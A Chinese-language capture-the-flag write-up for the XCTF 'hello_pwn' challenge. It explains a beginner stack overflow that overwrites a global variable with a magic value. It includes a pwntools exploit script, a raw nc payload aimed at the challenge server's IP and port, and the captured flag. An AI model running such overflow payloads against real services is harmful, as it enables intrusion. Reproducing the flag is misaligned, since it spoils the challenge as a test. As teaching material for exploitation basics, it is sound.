攻防世界 Pwn hello_pwn
1.checksec走一下
可以看到只有 Partial RELRO
没有开启栈保护,是属于简单的栈溢出pwn题
2.先跑一下看看
## 3.拉进IDA看一下
sub_400686函数中调用系统函数直接获取flag
因此如果让60106c == 1853186401就可以获取到flag
看到危险函数read可以实现栈溢出,把601068填满后再覆盖60106c即可
偏移地址是4
然后打入p64(1853186401)
4.exp如下
##coding=utf8
from pwn import *
## 构造与程序交互的对象
sh = remote('111.200.241.244', 52706)
## 构造payload
payload = b'x' * 4
payload = payload + p64(1853186401)
print(p64(1853186401))
## 向程序发送字符串
sh.recvuntil("lets get helloworld for bof\n")
sh.sendline(payload)
## 将代码交互转换为手工交互
sh.interactive()
5.运行结果如下
成功获取到flag
cyberpeace{5e30657f17da9ee9ce8066fbfca87bed}
6.可以不用python
直接nc服务器然后发送垃圾数据+p64(1853186401)即可
nc 111.200.241.244 52706
xxxxaaun
4个‘x’(垃圾数据)+aaun
总结
这是一道简单的pwn入门题,运用了简单的栈溢出